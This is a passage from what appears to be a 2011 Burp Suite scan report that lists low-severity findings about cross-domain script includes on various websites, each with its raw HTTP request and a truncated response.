Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:22:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.81. http://boardreader.com/yourform.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/yourform.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /yourform.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:21:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>Boardreader S
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.82. http://brandonaaron.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://brandonaaron.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://i.simpli.fi/dpx.js?cid=107

Request

GET / HTTP/1.1
Host: brandonaaron.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:07 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.0.6
X-Runtime: 1ms
ETag: "2940c0d4bbad867de292e66ee6fc7327"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _blog_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--43c046f6acf84405a38de8e12fc2c472b1d35a90; path=/; HttpOnly
Content-Length: 19341
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>Brandon Aaron : Blog</title>
<meta content='text/html; charset=utf-8' http-equiv='Content-type' />
<link href='/favicon.ico' rel='shortcut icon' />

...[SNIP]...
</script>
<script src='http://i.simpli.fi/dpx.js?cid=107' type='text/javascript'></script>
...[SNIP]...

18.83. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/browseresources/articles/firststeps.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js
https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js

Request

GET /browseresources/articles/firststeps.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.84. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/browseresources/articles/managingemployees.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js
https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js

Request

Response

18.85. http://businessonmain.msn.com/questions/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/questions/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js
https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js

Request

GET /questions/default.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.86. http://businessonmain.msn.com/videos/coolrunnings.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/videos/coolrunnings.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js
https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js

Request

GET /videos/coolrunnings.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.87. http://careers.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://careers.orbitz.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://twitter.com/javascripts/blogger.js

Request

GET / HTTP/1.1
Host: careers.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:29:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.11 mod_ssl/2.8.31 OpenSSL/0.9.8e
X-Powered-By: PHP/5.2.11
Connection: close
Content-Type: text/html
Content-Length: 14264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head>
<tit
...[SNIP]...


<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
...[SNIP]...

18.88. http://cdn.cloudscan.us/cloudscandetails.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.cloudscan.us
Path:	/cloudscandetails.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com

Request

GET /cloudscandetails.aspx HTTP/1.1
Host: cdn.cloudscan.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4uxkin45wlyds345rostftu1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 07:28:42 GMT
Connection: close
Content-Length: 96421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Scan Product
...[SNIP]...

<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...

18.89. http://cdn.cloudscan.us/learning.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.cloudscan.us
Path:	/learning.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://www.google.com/jsapi

Request

GET /learning.aspx HTTP/1.1
Host: cdn.cloudscan.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1amzrny4muom3bn5fdj0kqjy; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 07:28:59 GMT
Connection: close
Content-Length: 80640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
XSS, SQL Inje
...[SNIP]...

<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.90. http://cherne.net/brian/resources/jquery.hoverIntent.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cherne.net
Path:	/brian/resources/jquery.hoverIntent.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET /brian/resources/jquery.hoverIntent.html HTTP/1.1
Host: cherne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:37 GMT
Server: Apache
Last-Modified: Tue, 11 May 2010 02:34:12 GMT
ETag: "583c1ea-2ab4-486485c59d100"
Accept-Ranges: bytes
Content-Length: 10932
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...


<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

18.91. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js
http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify.js

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:38 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=67f4248f6f4e927e:TM=1296663519:LM=1296663519:S=3qkYaXXnuUHAF5bU; expires=Fri, 01-Feb-2013 16:18:39 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

var codesite_
...[SNIP]...
</table>
<script src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js"></script>
...[SNIP]...

18.92. http://code.google.com/p/swfobject/wiki/documentation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/wiki/documentation

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js
http://www.gstatic.com/codesite/ph/3799605220899551948/js/dit_scripts.js
http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify/prettify.js

Request

GET /p/swfobject/wiki/documentation HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:38 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=febcf9fa8da9b901:TM=1296663519:LM=1296663519:S=5-AUrgWhoWp7Jc89; expires=Fri, 01-Feb-2013 16:18:39 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function
...[SNIP]...
</form>

<script src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify/prettify.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/dit_scripts.js"></script>

<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js"></script>
...[SNIP]...

18.93. http://consumershealthyliving.com/clinical-study.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://consumershealthyliving.com
Path:	/clinical-study.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.statcounter.com/counter/counter.js

Request

GET /clinical-study.html HTTP/1.1
Host: consumershealthyliving.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.94. http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.msn.com
Path:	/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/4713977068982ab8195d08eef7655a7e99b08ed4.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz HTTP/1.1
Host: cosmiclog.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.95. http://creativecommons.org/licenses/by-nd/2.5/br/deed.en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creativecommons.org
Path:	/licenses/by-nd/2.5/br/deed.en_US

Issue detail

The response dynamically includes the following scripts from other domains:

http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js
http://yui.yahooapis.com/2.6.0/build/container/container-min.js
http://yui.yahooapis.com/2.6.0/build/json/json-min.js
http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /licenses/by-nd/2.5/br/deed.en_US HTTP/1.1
Host: creativecommons.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 26 Jan 2011 20:33:28 GMT
ETag: "3c71d-48e8-49ac5bed97600"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 18664
Date: Tue, 01 Feb 2011 14:32:08 GMT
X-Varnish: 568893577 568887346
Age: 46
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:cc="http://creativecommons.org/ns#"

...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/json/json-min.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/container/container-min.js">
</script>
...[SNIP]...

18.96. http://creativecommons.org/licenses/by-sa/3.0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creativecommons.org
Path:	/licenses/by-sa/3.0/

Issue detail

The response dynamically includes the following scripts from other domains:

http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js
http://yui.yahooapis.com/2.6.0/build/container/container-min.js
http://yui.yahooapis.com/2.6.0/build/json/json-min.js
http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /licenses/by-sa/3.0/ HTTP/1.1
Host: creativecommons.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21115
Date: Wed, 02 Feb 2011 19:18:50 GMT
X-Varnish: 2120528319 2120508558
Age: 100
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:cc="http://creativecommons.org/ns#"

...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/json/json-min.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/container/container-min.js">
</script>
...[SNIP]...

18.97. http://cruises.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cruises.orbitz.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau
http://www.revresda.com/js.ng/channel=cruise&Section=main&adsize=336x280&dest=&SessionID=19412021&tile=1574212908744&CookieName=OSC&secure=false&site=orbitz
http://www.revresda.com/js.ng/channel=cruise&Section=main&adsize=519x225&dest=&SessionID=19412021&tile=1574212908744&CookieName=OSC&secure=false&site=orbitz
http://www.revresda.com/js.ng/channel=cruise&Section=main&adsize=728x90&dest=&SessionID=19412021&tile=1574212908744&CookieName=OSC&secure=false&site=orbitz

Request

GET / HTTP/1.1
Host: cruises.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Content-Length: 94093
Content-Type: text/html
Set-Cookie: WDVID=%7BAFB0B749%2D075D%2D44BF%2DB60B%2DB6BF043B31B7%7D; path=/
Set-Cookie: WDUID=%7BE5904506%2D9924%2D4D11%2DBA78%2DE65D804B066F%7D; expires=Wed, 02-Feb-2022 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCSQDSDDC=LJFDICBAGOGCDGDPGGGHPIFM; path=/
Cache-control: private
Set-Cookie: NSC_WJQ-DSVJTFT.PSCJUA.DPN=ffffffff095b1c2245525d5f4f58455e445a4a423662;path=/

<script language="javascript">
<!--

var flashinstalled = 0;
var flashversion = 0;
MSDetect = "false";
if (navigator.plugins && navigator.plugins.length)
{
x = navigator.plugins["Shockwave Fl
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau"></script>
...[SNIP]...
<div class="ad">
<script language="Javascript1.1"
src="http://www.revresda.com//js.ng/channel=cruise&Section=main&adsize=519x225&dest=&SessionID=19412021&tile=1574212908744&CookieName=OSC&secure=false&site=orbitz">
</script>
...[SNIP]...
<div class="ad">
<script language="Javascript1.1"
src="http://www.revresda.com//js.ng/channel=cruise&Section=main&adsize=336x280&dest=&SessionID=19412021&tile=1574212908744&CookieName=OSC&secure=false&site=orbitz">
</script>
...[SNIP]...
<div class="ad">
<script language="Javascript1.1"
src="http://www.revresda.com//js.ng/channel=cruise&Section=main&adsize=728x90&dest=&SessionID=19412021&tile=1574212908744&CookieName=OSC&secure=false&site=orbitz">
</script>
...[SNIP]...

18.98. http://dating.msn.com/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.msn.com
Path:	/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/scripts/jquery.shuffle.js

Request

GET /index.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.99. http://dating.msn.com/search/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.msn.com
Path:	/search/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js

Request

GET /search/index.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.100. http://dean.edwards.name/weblog/2006/06/again/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The response dynamically includes the following script from another domain:

http://deanedwardsoffline.appspot.com/js/my.js

Request

GET /weblog/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:40 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Tue, 01 Feb 2011 15:31:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 213580

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://d
...[SNIP]...
<link rel="icon" href="/favicon.ico" type="image/x-icon">
<script src="http://deanedwardsoffline.appspot.com/js/my.js"></script>
...[SNIP]...

18.101. http://dev.twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dev.twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/dev/jquery.form.js?1296614487
http://a0.twimg.com/a/1296609216/javascripts/dialog.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/dev/jquery.ui.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/dev/json2.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/dev/toc.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/base.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/dev/hurl.headers.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/dev/hurl.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/dev/jquery.autocomplete.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dev/dev.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dev/jquery.min.js?1296614487

Request

GET / HTTP/1.1
Host: dev.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:18:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296674330-72244-42214
ETag: "934b54f1a54905f44c5f08e31e76ff12"
Last-Modified: Wed, 02 Feb 2011 19:18:50 GMT
X-Runtime: 0.03334
Content-Type: text/html; charset=utf-8
Content-Length: 8908
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296674330831255; path=/; expires=Wed, 09-Feb-11 19:18:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=129667433084978945; path=/; expires=Fri, 04 Mar 2011 19:18:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCOQY0OctAToOcmV0dXJuX3RvIhxodHRwOi8v%250AZGV2LnR3aXR0ZXIuY29tLzoHaWQiJTgxNjZlZjA5Yjk3MDk3ZTkzNzY3NzNl%250AZTdlZjA3ZDE1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6%250ARmxhc2hIYXNoewAGOgpAdXNlZHsA--3f74dffcbda83e02ede7f40fb1c9fbf484dea921; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<link href="http://a1.twimg.com/a/1296609216/stylesheets/dialog.css?1296614487" media="screen" rel="stylesheet" type="text/css" />
<script src="http://a3.twimg.com/a/1296609216/javascripts/dev/jquery.min.js?1296614487" type="text/javascript"></script> <script src="http://a0.twimg.com/a/1296609216/javascripts/dev/jquery.form.js?1296614487" type="text/javascript"></script> <script src="http://a1.twimg.com/a/1296609216/javascripts/dev/jquery.ui.js?1296614487" type="text/javascript"></script> <script src="http://a2.twimg.com/a/1296609216/javascripts/dev/jquery.autocomplete.js?1296614487" type="text/javascript"></script> <script src="http://a1.twimg.com/a/1296609216/javascripts/dev/json2.js?1296614487" type="text/javascript"></script> <script src="http://a2.twimg.com/a/1296609216/javascripts/dev/hurl.js?1296614487" type="text/javascript"></script> <script src="http://a2.twimg.com/a/1296609216/javascripts/dev/hurl.headers.js?1296614487" type="text/javascript"></script> <script src="http://a2.twimg.com/a/1296609216/javascripts/base.js?1296614487" type="text/javascript"></script> <script src="http://a0.twimg.com/a/1296609216/javascripts/dialog.js?1296614487" type="text/javascript"></script> <script src="http://a3.twimg.com/a/1296609216/javascripts/dev/dev.js?1296614487" type="text/javascript"></script> <script src="http://a1.twimg.com/a/1296609216/javascripts/dev/toc.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.102. http://developer.yahoo.com/yui/compressor/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.yahoo.com
Path:	/yui/compressor/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/mi/ywa.js
http://l.yimg.com/d/lib/rt/rto1_78.js
http://yui.yahooapis.com/combo?2.8.2r1/build/yuiloader-dom-event/yuiloader-dom-event.js&3.2.0/build/yui/yui-min.js

Request

GET /yui/compressor/ HTTP/1.1
